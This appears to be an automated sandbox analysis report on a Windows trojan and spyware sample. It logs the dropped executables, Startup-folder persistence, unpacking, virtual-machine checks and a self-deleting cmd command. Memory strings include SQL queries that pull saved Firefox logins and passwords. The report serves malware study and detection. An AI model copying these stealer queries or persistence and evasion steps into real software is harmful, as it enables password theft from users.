Source: 4.exe.13.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: SmartClock.exe.16.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@41/35@5/3

Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe

Code function: 18_2_00408E03 wvsprintfW,GetLastError,FormatMessageW,FormatMessageW,FormatMessageW,lstrlenW,lstrlenW,lstrlenW,??2@YAPAXI@Z,lstrcpyW,lstrcpyW,lstrcpyW,??3@YAXPAX@Z,LocalFree,

18_2_00408E03

Source: C:\Users\user\AppData\Local\Temp\Murano.exe

13_2_004044D1

Source: C:\Users\user\AppData\Local\Temp\Murano.exe

Code function: 13_2_004024FB CoCreateInstance,

13_2_004024FB

Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe

Code function: 16_2_004017BA FindResourceW,LoadResource,LockResource,SizeofResource,

16_2_004017BA

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe

File created: C:\Users\user\AppData\Roaming\Satir

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6964:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5568:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2900:120:WilError_01
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Mutant created: \Sessions\1\BaseNamedObjects\{48D87B02-03F7-4188-8BE8-7733FF2CBCA6}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5696:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6988:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6808:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6788:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5188:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:852:120:WilError_01

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe

File created: C:\Users\user\AppData\Local\Temp\tZVdZWix

Jump to behavior

Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe	Binary or memory string: SELECT a11, a102 FROM nssPrivate;
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe	Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe	Binary or memory string: SELECT item1, item2 FROM metadata WHERE id = 'password';
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe	Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, 00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmp	Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe	Binary or memory string: SELECT formSubmitURL, encryptedUsername, encryptedPassword FROM moz_logins;
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe	Binary or memory string: SELECT 'DELETE FROM vacuum_db.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'

Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe	Virustotal: Detection: 30%
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe	ReversingLabs: Detection: 33%

Source: unknown	Process created: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe 'C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe'
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe	Process created: C:\Users\user\AppData\Local\Temp\Murano.exe 'C:\Users\user\AppData\Local\Temp\Murano.exe'
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /c rd /s /q C:\Users\user\AppData\Local\Temp\UdRFIiqEaRrk & timeout 3 & del /f /q 'C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Murano.exe	Process created: C:\Users\user\AppData\Local\Temp\New Feature\4.exe C:\Users\user\AppData\Local\Temp\New Feature\4.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 3
Source: C:\Users\user\AppData\Local\Temp\Murano.exe	Process created: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe	Process created: C:\Windows\SysWOW64\makecab.exe 'C:\Windows\System32\makecab.exe'
Source: C:\Windows\SysWOW64\makecab.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe	Process created: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe	Process created: C:\Windows\SysWOW64\makecab.exe 'C:\Windows\System32\makecab.exe'
Source: C:\Windows\SysWOW64\makecab.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe	Process created: C:\Windows\SysWOW64\makecab.exe 'C:\Windows\System32\makecab.exe'
Source: C:\Windows\SysWOW64\makecab.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe	Process created: C:\Windows\SysWOW64\makecab.exe 'C:\Windows\System32\makecab.exe'
Source: C:\Windows\SysWOW64\makecab.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe	Process created: C:\Windows\SysWOW64\makecab.exe 'C:\Windows\System32\makecab.exe'
Source: C:\Windows\SysWOW64\makecab.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe 'C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe'
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe	Process created: C:\Windows\SysWOW64\makecab.exe 'C:\Windows\System32\makecab.exe'
Source: C:\Windows\SysWOW64\makecab.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe	Process created: C:\Windows\SysWOW64\makecab.exe 'C:\Windows\System32\makecab.exe'
Source: C:\Windows\SysWOW64\makecab.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c C:\Windows\System32\cmd.exe < Scoprirvi.eps
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe	Process created: C:\Users\user\AppData\Local\Temp\Murano.exe 'C:\Users\user\AppData\Local\Temp\Murano.exe'	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /c rd /s /q C:\Users\user\AppData\Local\Temp\UdRFIiqEaRrk & timeout 3 & del /f /q 'C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Murano.exe	Process created: C:\Users\user\AppData\Local\Temp\New Feature\4.exe C:\Users\user\AppData\Local\Temp\New Feature\4.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Murano.exe	Process created: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 3	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe	Process created: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe	Process created: C:\Windows\SysWOW64\makecab.exe 'C:\Windows\System32\makecab.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe	Process created: C:\Windows\SysWOW64\makecab.exe 'C:\Windows\System32\makecab.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe	Process created: C:\Windows\SysWOW64\makecab.exe 'C:\Windows\System32\makecab.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe	Process created: C:\Windows\SysWOW64\makecab.exe 'C:\Windows\System32\makecab.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe	Process created: C:\Windows\SysWOW64\makecab.exe 'C:\Windows\System32\makecab.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe	Process created: C:\Windows\SysWOW64\makecab.exe 'C:\Windows\System32\makecab.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe	Process created: C:\Windows\SysWOW64\makecab.exe 'C:\Windows\System32\makecab.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c C:\Windows\System32\cmd.exe < Scoprirvi.eps	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{515980c3-57fe-4c1e-a561-730dd256ab98}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Data Obfuscation:

Detected unpacking (changes PE section rights)

Show sources

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe	Unpacked PE file: 0.2.SecuriteInfo.com.W32.AIDetect.malware1.24453.exe.400000.0.unpack .text:ER;.data:W;.hejus:W;.tiyovo:W;.new:R;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe	Unpacked PE file: 16.2.4.exe.400000.0.unpack .text:ER;.data:W;.yiku:W;.padozoc:W;.new:R;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Unpacked PE file: 22.2.SmartClock.exe.400000.0.unpack .text:ER;.data:W;.yiku:W;.padozoc:W;.new:R;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Unpacked PE file: 25.2.SmartClock.exe.400000.0.unpack .text:ER;.data:W;.yiku:W;.padozoc:W;.new:R;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Unpacked PE file: 33.2.SmartClock.exe.400000.0.unpack .text:ER;.data:W;.yiku:W;.padozoc:W;.new:R;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;

Detected unpacking (overwrites its own PE header)

Show sources

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe	Unpacked PE file: 0.2.SecuriteInfo.com.W32.AIDetect.malware1.24453.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe	Unpacked PE file: 16.2.4.exe.400000.0.unpack
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Unpacked PE file: 22.2.SmartClock.exe.400000.0.unpack
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Unpacked PE file: 25.2.SmartClock.exe.400000.0.unpack
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Unpacked PE file: 33.2.SmartClock.exe.400000.0.unpack

Source: C:\Users\user\AppData\Local\Temp\Murano.exe

Code function: 13_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,

13_2_00406328

Source: vpn.exe.13.dr	Static PE information: real checksum: 0x11b384 should be: 0x11fc4a
Source: UAC.dll.13.dr	Static PE information: real checksum: 0x0 should be: 0xde12

Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe	Static PE information: section name: .hejus
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe	Static PE information: section name: .tiyovo
Source: SecuriteInfo.com.W32.AIDetect.malware1.24453.exe	Static PE information: section name: .new
Source: 4.exe.13.dr	Static PE information: section name: .yiku
Source: 4.exe.13.dr	Static PE information: section name: .padozoc
Source: 4.exe.13.dr	Static PE information: section name: .new
Source: SmartClock.exe.16.dr	Static PE information: section name: .yiku
Source: SmartClock.exe.16.dr	Static PE information: section name: .padozoc
Source: SmartClock.exe.16.dr	Static PE information: section name: .new

Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe	Code function: 16_2_0041D1BC push eax; retn 0041h	16_2_0041D1E1
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe	Code function: 16_2_0041CA40 pushad ; retn 0041h	16_2_0041CBB9
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe	Code function: 16_2_0041BB1C pushad ; retn 0041h	16_2_0041BB45
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe	Code function: 16_2_0040A446 push ecx; ret	16_2_0040A459
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe	Code function: 16_2_004075A2 push eax; mov dword ptr [esp], ecx	16_2_004075A7
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe	Code function: 16_2_03F577F2 push eax; mov dword ptr [esp], ecx	16_2_03F577F7
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe	Code function: 16_2_03F6B76C pushad ; retn 0041h	16_2_03F6B795
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe	Code function: 16_2_03F5A696 push ecx; ret	16_2_03F5A6A9
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe	Code function: 16_2_03F6C690 pushad ; retn 0041h	16_2_03F6C809
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe	Code function: 16_2_03F6CE0C push eax; retn 0041h	16_2_03F6CE31
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe	Code function: 18_2_004186D0 push eax; ret	18_2_004186FE
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 22_2_0041D1BC push eax; retn 0041h	22_2_0041D1E1
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 22_2_0041CA40 pushad ; retn 0041h	22_2_0041CBB9
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 22_2_0041BB1C pushad ; retn 0041h	22_2_0041BB45
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 22_2_0040A446 push ecx; ret	22_2_0040A459
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 22_2_004075A2 push eax; mov dword ptr [esp], ecx	22_2_004075A7
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 22_2_05A077F2 push eax; mov dword ptr [esp], ecx	22_2_05A077F7
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 22_2_05A1B76C pushad ; retn 0041h	22_2_05A1B795
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 22_2_05A1C690 pushad ; retn 0041h	22_2_05A1C809
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 22_2_05A0A696 push ecx; ret	22_2_05A0A6A9
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 22_2_05A1CE0C push eax; retn 0041h	22_2_05A1CE31
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 25_2_0041D1BC push eax; retn 0041h	25_2_0041D1E1
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 25_2_0041CA40 pushad ; retn 0041h	25_2_0041CBB9
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 25_2_0041BB1C pushad ; retn 0041h	25_2_0041BB45
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 25_2_0040A446 push ecx; ret	25_2_0040A459
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 25_2_004075A2 push eax; mov dword ptr [esp], ecx	25_2_004075A7
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 25_2_059D77F2 push eax; mov dword ptr [esp], ecx	25_2_059D77F7
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 25_2_059EB76C pushad ; retn 0041h	25_2_059EB795
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 25_2_059DA696 push ecx; ret	25_2_059DA6A9
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 25_2_059EC690 pushad ; retn 0041h	25_2_059EC809
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 25_2_059ECE0C push eax; retn 0041h	25_2_059ECE31

Source: initial sample	Static PE information: section name: .text entropy: 7.87132737384
Source: initial sample	Static PE information: section name: .text entropy: 7.34669656033
Source: initial sample	Static PE information: section name: .text entropy: 7.34669656033

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe

0_2_0040C561

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\lv[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Murano.exe	File created: C:\Users\user\AppData\Local\Temp\nsg8FBB.tmp\UAC.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Murano.exe	File created: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe	File created: C:\Users\user\AppData\Local\Temp\Murano.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe	File created: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Murano.exe	File created: C:\Users\user\AppData\Local\Temp\New Feature\4.exe	Jump to dropped file

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe

Code function: 0_2_00409DF0 ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,GetPrivateProfileStringW,CreateFileW,CreateFileW,CloseHandle,CloseHandle,CreateFileW,CloseHandle,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,CopyFileW,CopyFileW,CopyFileW,GetFileAttributesW,GetFileAttributesW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,UnmapViewOfFile,CloseHandle,CloseHandle,CloseHandle,GetFileAttributesW,WideCharToMultiByte,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,

0_2_00409DF0

Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SmartClock.lnk

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SmartClock.lnk

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Murano.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Delayed program exit found

Show sources

Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe	Code function: 16_2_004011E2 Sleep,ExitProcess,	16_2_004011E2
Source: C:\Users\user\AppData\Local\Temp\New Feature\4.exe	Code function: 16_2_03F51432 Sleep,ExitProcess,	16_2_03F51432
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 22_2_004011E2 Sleep,ExitProcess,	22_2_004011E2
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 22_2_05A01432 Sleep,ExitProcess,	22_2_05A01432
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 25_2_004011E2 Sleep,ExitProcess,	25_2_004011E2
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 25_2_059D1432 Sleep,ExitProcess,	25_2_059D1432

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\New Feature\vpn.exe	File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}			Jump to behavior

Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe

Registry key enumerated: More than 346 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe TID: 5856	Thread sleep time: -102511s >= -30000s	Jump to behavior
Source: C:\Windows\System32\conhost.exe TID: 1400	Thread sleep count: 40 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe TID: 3152	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\conhost.exe TID: 2896	Thread sleep count: 34 > 30

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe	Code function: 0_2_0040F1D0 FindFirstFileW,FindNextFileW,FindClose,	0_2_0040F1D0
